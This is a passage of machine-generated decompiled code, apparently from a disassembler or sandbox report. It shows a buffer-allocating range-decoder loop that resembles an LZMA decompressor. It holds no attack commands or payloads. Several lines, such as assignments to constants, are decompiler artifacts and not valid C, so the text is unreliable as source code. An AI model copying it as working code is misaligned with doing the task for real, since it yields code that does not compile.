													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
